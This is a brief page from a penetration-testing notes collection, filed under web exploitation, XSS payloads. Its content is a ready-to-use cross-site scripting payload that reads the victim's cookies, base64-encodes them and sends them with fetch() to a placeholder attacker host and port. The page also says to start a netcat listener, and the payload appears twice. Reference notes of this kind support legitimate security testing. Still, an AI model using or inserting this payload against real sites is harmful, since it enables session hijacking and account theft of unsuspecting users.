CtrlK
Pentest Notes / Exploitation / Web Exploitation
XSS
Payloads
Extract cookies
Start nc
<script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script>
Pentest Notes / Exploitation / Web Exploitation
Start nc
<script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script>